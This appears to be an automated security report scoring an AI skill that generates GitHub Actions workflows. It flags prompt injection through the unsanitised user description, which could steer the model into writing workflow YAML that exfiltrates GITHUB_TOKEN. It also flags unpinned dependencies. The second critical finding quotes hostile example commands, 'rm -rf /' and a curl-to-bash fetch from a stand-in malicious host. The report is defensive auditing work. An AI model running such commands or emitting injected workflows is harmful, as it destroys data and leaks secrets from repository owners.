Trust Assessment
github-action-gen received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 2 critical, 0 high, 1 medium, and 0 low severity. Key findings include Unpinned npm dependency version, Direct User Input in LLM Prompt, Arbitrary Command Execution and Data Exfiltration via Maliciously Generated GitHub Actions YAML.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Direct User Input in LLM Prompt The user-provided `description` argument is directly concatenated into the `user` message sent to the OpenAI API without any sanitization or validation. This allows an attacker to inject arbitrary instructions into the LLM's prompt, potentially overriding system instructions, extracting sensitive information from the LLM's context, or influencing the generated output in unintended ways. This is the root cause for subsequent command injection and data exfiltration risks. Implement robust input validation and sanitization for user-provided descriptions. Consider using prompt templating engines that strictly separate user input from system instructions, or employ techniques like input filtering, escaping, or a separate LLM call for input classification/refinement before generating the final prompt. | LLM | src/index.ts:13 | |
| CRITICAL | Arbitrary Command Execution and Data Exfiltration via Maliciously Generated GitHub Actions YAML The skill generates GitHub Actions YAML based on user input, which is then written to a file (either `.github/workflows/ai-generated.yml` or a user-specified path via `-o`) and intended for execution by GitHub Actions. Due to the prompt injection vulnerability (SS-LLM-001), a malicious user can craft a `description` that instructs the LLM to generate YAML containing arbitrary shell commands. When this YAML is executed in a GitHub Actions runner, it can lead to:
1. **Command Injection:** Execution of arbitrary commands on the runner (e.g., `rm -rf /`, `curl malicious.com/payload | bash`).
2. **Data Exfiltration:** Leakage of sensitive data from the runner environment, including environment variables (like `GITHUB_TOKEN`), repository files, or other secrets accessible to the runner. 1. **Mitigate Prompt Injection:** Address the SS-LLM-001 finding to prevent the LLM from generating malicious YAML. 2. **Output Validation:** Implement strict validation or an allow-list for the generated YAML content to ensure it only contains safe and expected GitHub Actions constructs. This could involve parsing the YAML and checking for dangerous keywords, commands, or patterns. 3. **Least Privilege:** Advise users to run generated workflows with the minimum necessary permissions. 4. **User Confirmation:** For critical actions, require explicit user confirmation before writing or applying the generated workflow. | LLM | src/cli.ts:23 | |
| MEDIUM | Unpinned npm dependency version Dependency 'commander' is not pinned to an exact version ('^12.1.0'). Pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/lxgicstudios/github-action-gen/package.json | |
| INFO | Dependencies Pinned to Caret Ranges The `package.json` file specifies dependencies using caret (`^`) ranges (e.g., `^12.1.0`). While `package-lock.json` provides exact versions, relying solely on caret ranges in `package.json` can lead to unexpected dependency updates during installation, potentially introducing vulnerabilities or breaking changes if a new minor or patch version of a dependency contains malicious code or a bug. This is a minor supply chain risk. Consider pinning dependencies to exact versions (e.g., `12.1.0` instead of `^12.1.0`) in `package.json` to ensure deterministic builds and prevent unintended updates. Regularly audit and update dependencies. | LLM | package.json:9 |
Scan History
Embed Code
[](https://skillshield.io/report/11998ad64e2ba48d)
Powered by SkillShield